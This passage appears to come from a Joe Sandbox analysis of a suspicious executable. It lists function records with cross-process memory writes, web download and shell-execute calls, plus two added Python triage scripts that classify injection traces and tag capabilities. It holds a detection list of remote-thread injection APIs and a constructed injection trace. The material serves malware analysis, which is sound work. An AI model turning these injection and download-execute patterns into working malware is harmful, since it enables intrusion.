                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID: \
                                                                      • API String ID: 4104443479-2967466578
                                                                      • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                      • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                                                      • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                      • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID: \
                                                                      • API String ID: 4104443479-2967466578
                                                                      • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                      • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                                                      • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                      • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                                                      Strings
                                                                      • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                                      • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                      • API String ID: 708495834-557222456
                                                                      • Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                      • Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
                                                                      • Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
                                                                      • Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
                                                                      APIs
                                                                        • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
                                                                        • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
                                                                        • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
                                                                        • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
                                                                        • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
                                                                      • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                      • String ID: @
                                                                      • API String ID: 4150878124-2766056989
                                                                      • Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                      • Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
                                                                      • Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
                                                                      • Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
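                                                                      Reading the constants in the API sequence above: OpenProcess(0x438) asks for PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION and not PROCESS_CREATE_THREAD; VirtualAllocEx(..., 0x1000, 0x4) is MEM_COMMIT with PAGE_READWRITE, so the remote buffer is not executable; and 0x1104 / 0x1111 fall in the commctrl.h tree-view range (TV_FIRST + 4 = TVM_GETITEMRECT, TV_FIRST + 17 = TVM_HITTEST), messages whose lParam must point into the target window's own address space. Write, SendMessage, read back is therefore the standard way to query a common control owned by another process; it trips the "Writes to foreign memory regions" signature but, on its own, is not evidence of code injection. The script below is an added example, not part of the report or of the sample: it decodes those constants and applies that distinction to a trace constructed from the APIs lines above. The report does not name the target window class, so the tree-view decoding is an assumption, and the function and verdict names are mine.

```python
# Added example (not from the Joe Sandbox report or the analysed sample): decode the
# numeric arguments of an OpenProcess / VirtualAllocEx / SendMessageW / ReadProcessMemory
# trace and say what it does and does not prove. Constant names are from the Windows SDK
# (winnt.h, commctrl.h); traces, function names and verdict labels are constructed here.

PROCESS_ACCESS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA",
    0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
MEM_COMMIT = 0x1000
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
EXECUTABLE_PROTECT = {0x10, 0x20, 0x40}
# Tree-view messages are TV_FIRST + n. Assumption: the target window is a standard
# tree-view control; an app-defined WM_USER+n message could reuse the same numbers.
TV_FIRST = 0x1100
TREEVIEW_MSG = {TV_FIRST + 4: "TVM_GETITEMRECT", TV_FIRST + 12: "TVM_GETITEMA",
                TV_FIRST + 17: "TVM_HITTEST", TV_FIRST + 62: "TVM_GETITEMW"}
# APIs that turn a remote write into execution inside the target.
THREAD_PRIMITIVES = {"CreateRemoteThread", "NtCreateThreadEx", "RtlCreateUserThread",
                     "QueueUserAPC", "NtQueueApcThread", "SetThreadContext"}


def decode_process_access(mask):
    """Expand an OpenProcess dwDesiredAccess mask into SDK flag names."""
    names = [name for bit, name in sorted(PROCESS_ACCESS.items()) if mask & bit]
    unknown = mask & ~sum(PROCESS_ACCESS)  # any bits not covered by the table
    if unknown:
        names.append(f"0x{unknown:X}")
    return names


def decode_protect(protect):
    return PAGE_PROTECT.get(protect, f"0x{protect:X}")


def decode_message(msg):
    return TREEVIEW_MSG.get(msg, f"0x{msg:04X}")


def classify_remote_memory_sequence(calls):
    """calls: [(api_name, args)] in call order; args is a tuple, unknown values None.

    Verdicts: 'code injection' (remote write plus executable memory or a remote
    thread), 'cross-process control buffer' (RW buffer written, SendMessage, read
    back), 'remote write (inconclusive)', or 'no remote write'.
    """
    apis = [api for api, _ in calls]
    executable = any(api == "VirtualAllocEx" and len(args) > 4 and args[4] in EXECUTABLE_PROTECT
                     or api == "VirtualProtectEx" and len(args) > 3 and args[3] in EXECUTABLE_PROTECT
                     for api, args in calls)
    remote_thread = any(api in THREAD_PRIMITIVES for api in apis)
    if "WriteProcessMemory" not in apis:
        return "no remote write"
    if executable or remote_thread:
        return "code injection"
    if "SendMessageW" in apis and "ReadProcessMemory" in apis:
        return "cross-process control buffer"
    return "remote write (inconclusive)"


def summarize_trace(calls):
    """Decoded constants plus the verdict, for a quick read of a sandbox API list."""
    out = {}
    for api, args in calls:
        if api == "OpenProcess":
            out["access"] = decode_process_access(args[0])
        elif api == "VirtualAllocEx":
            out["alloc"] = ("MEM_COMMIT" if args[3] & MEM_COMMIT else f"0x{args[3]:X}",
                            decode_protect(args[4]))
        elif api == "SendMessageW":
            out.setdefault("messages", []).append(decode_message(args[1]))
    out["verdict"] = classify_remote_memory_sequence(calls)
    return out


# Constructed from the report's APIs lines for the function above (unknown args = None).
REPORT_TRACE = [
    ("GetWindowThreadProcessId", (None, None)),
    ("OpenProcess", (0x438, 0, None)),
    ("VirtualAllocEx", (None, 0, None, 0x1000, 0x4)),
    ("WriteProcessMemory", (None, None, None, None, 0)),
    ("SendMessageW", (None, 0x1104, 0, 0)),
    ("ReadProcessMemory", (None, None, None, None, 0)),
    ("SendMessageW", (None, 0x1111, 0, 0)),
]
# Constructed contrast case: same primitives, but RWX memory and a remote thread.
INJECTION_TRACE = [
    ("OpenProcess", (0x43A, 0, None)),
    ("VirtualAllocEx", (None, 0, None, 0x3000, 0x40)),
    ("WriteProcessMemory", (None, None, None, None, 0)),
    ("CreateRemoteThread", (None, 0, 0, None, None, 0, None)),
]

if __name__ == "__main__":
    for label, trace in (("report", REPORT_TRACE), ("injection", INJECTION_TRACE)):
        print(label, summarize_trace(trace))
```

                                                                      The verdict is deliberately conservative: a PAGE_READWRITE allocation can still be made executable later, and a payload can be run without a remote thread (thread hijacking, APC), so treat "cross-process control buffer" as "this function alone does not inject" and check the rest of the trace before clearing the sample on this basis.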
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove
                                                                      • String ID: \$]$h
                                                                      • API String ID: 4104443479-3262404753
                                                                      • Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                      • Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
                                                                      • Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
                                                                      • Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
                                                                      APIs
                                                                      • ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
                                                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                      • CloseHandle.KERNEL32(?), ref: 00457E09
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                                      • String ID: <$@
                                                                      • API String ID: 2417854910-1426351568
                                                                      • Opcode ID: 024707e8d0be736fd9aee974053134abdf34597ecb22147b7e98c4ffc578353a
                                                                      • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                                      • Opcode Fuzzy Hash: 024707e8d0be736fd9aee974053134abdf34597ecb22147b7e98c4ffc578353a
                                                                      • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                                      APIs
                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                                        • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                      • String ID:
                                                                      • API String ID: 3705125965-3916222277
                                                                      • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                      • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                                      • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                      • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                                      APIs
                                                                      • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                                      • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                                      • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Delete$InfoItem
                                                                      • String ID: 0
                                                                      • API String ID: 135850232-4108050209
                                                                      • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                      • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                                      • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                      • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                                      APIs
                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Long
                                                                      • String ID: SysTreeView32
                                                                      • API String ID: 847901565-1698111956
                                                                      • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                      • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                                      • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                      • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                                      APIs
                                                                      • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                                      • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                                      • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Library$AddressFreeLoadProc
                                                                      • String ID: AU3_GetPluginDetails
                                                                      • API String ID: 145871493-4132174516
                                                                      • Opcode ID: eeab42aefd2d36d06d7687f66def4b4fc74e6333f2f3c4216b61849e5f0d6007
                                                                      • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                                      • Opcode Fuzzy Hash: eeab42aefd2d36d06d7687f66def4b4fc74e6333f2f3c4216b61849e5f0d6007
                                                                      • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
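Of the records in this block, three are the ones a triage analyst pivots on: the ShellExecuteExW wrapper, the WinINet InternetOpenUrlW/HttpSendRequestW/HttpQueryInfoW download helper, and the LoadLibraryA/GetProcAddress lookup of `AU3_GetPluginDetails`. The address-free fields (API String ID, Opcode ID, Instruction Fuzzy Hash) are what carry to other dumps; the `ref:` addresses are specific to this image base. One caveat before treating those functions as bespoke malware code: `AU3_GetPluginDetails` is the export AutoIt3 resolves from plugin DLLs, and the `SysTreeView32`, `SysMonthCal32` and `msctls_updown32` class names in the neighbouring records are the common controls AutoIt's GUI functions create, so this set is consistent with a compiled AutoIt interpreter whose generic download/execute/load capabilities are being listed, not with keylogger-specific logic. The script below is an added example, not Joe Sandbox tooling or part of this report: it parses records in the format shown here (the three sample records are copied from this page, trimmed to the fields the triage reads and embedded inline), tags each function by the capability its direct imports imply, and flags records whose String ID names a known interpreter export. The capability rules and the runtime-string table are this example's own assumptions.

```python
"""Parse Joe Sandbox per-function records (the 'APIs' / 'Strings' /
'Similarity' blocks in this report) and tag each function by the capability
its direct imports imply.  Added example, not Joe Sandbox tooling."""
import re
from collections import defaultdict

# Constructed input: three records copied from this report, trimmed to the
# fields used below (indentation and the "Download File" link text dropped).
SAMPLE = """\
APIs
• ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
• CloseHandle.KERNEL32(?), ref: 00457E09
Strings
Similarity
• API ID: CloseExecuteHandleShell_wcscpy_wcslen
• String ID: <$@
• API String ID: 2417854910-1426351568
• Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
APIs
• InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
Strings
Similarity
• API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
• String ID:
• API String ID: 3705125965-3916222277
• Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
APIs
• LoadLibraryA.KERNEL32(?), ref: 00434B10
• GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
• FreeLibrary.KERNEL32(?), ref: 00434B9F
Strings
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: AU3_GetPluginDetails
• API String ID: 145871493-4132174516
• Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
"""

# Direct call:  "• Name.MODULE(args), ref: 0040xxxx"
# Subcall:      "  • Part of subcall function 0040xxxx: Name.MODULE ref: 0040xxxx"
CALL_RE = re.compile(
    r"•\s+(?:Part of subcall function [0-9A-F]+:\s+)?"
    r"(?P<fn>[A-Za-z_]\w*)\.(?P<mod>[A-Z0-9]+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-F]+)"
)
# Key/value lines of the Similarity section ("• API String ID: ...").
FIELD_RE = re.compile(r"^•\s+(?P<key>[A-Za-z ]+):\s*(?P<val>.*)$")


def parse_records(text):
    """Split the dump on 'APIs' headers; return one dict per function."""
    records = []
    for chunk in re.split(r"^APIs$", text, flags=re.M):
        if not chunk.strip():
            continue
        rec = {"calls": [], "fields": {}}
        for line in chunk.splitlines():
            line = line.strip()
            m = CALL_RE.search(line)
            if m:
                rec["calls"].append({**m.groupdict(), "direct": not line.startswith("• Part of")})
                continue
            m = FIELD_RE.match(line)
            if m:
                rec["fields"][m["key"]] = m["val"].strip()
        records.append(rec)
    return records


# Capability rules (this example's assumption, not a Joe Sandbox taxonomy).
# Only direct calls count: a subcall's GetLastError says nothing about the caller.
RULES = {
    "download": lambda c: c["mod"] == "WININET",
    "execute": lambda c: c["fn"] in {"ShellExecuteExW", "ShellExecuteW", "CreateProcessW", "WinExec"},
    "dynamic-import": lambda c: c["fn"] in {"LoadLibraryA", "LoadLibraryW", "GetProcAddress"},
}
# Exports that mark interpreter/runtime code rather than payload logic.
# AU3_GetPluginDetails is the export AutoIt3 resolves from plugin DLLs.
RUNTIME_STRINGS = {"AU3_GetPluginDetails": "AutoIt3 runtime (plugin loader)"}


def triage(records):
    """Return {tag: sorted Instruction Fuzzy Hashes} for each capability hit,
    plus 'runtime': {fuzzy hash: label} for records whose String ID names a
    known interpreter export.  Fuzzy hashes, not addresses, are the pivot for
    finding the same function in other dumps."""
    hits, runtime = defaultdict(set), {}
    for rec in records:
        fh = rec["fields"].get("Instruction Fuzzy Hash", "")
        for tag, rule in RULES.items():
            if any(rule(c) for c in rec["calls"] if c["direct"]):
                hits[tag].add(fh)
        label = RUNTIME_STRINGS.get(rec["fields"].get("String ID", ""))
        if label:
            runtime[fh] = label
    result = {tag: sorted(h) for tag, h in hits.items()}
    result["runtime"] = runtime
    return result


if __name__ == "__main__":
    for tag, value in triage(parse_records(SAMPLE)).items():
        print(tag, value)
```

Run it against a full report by pasting the function listing into `SAMPLE` or reading it from a file; records that carry a `runtime` label should be discounted when deciding which functions are worth a second look, and the remaining tagged fuzzy hashes are the ones to search for in other samples' dumps.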
                                                                      APIs
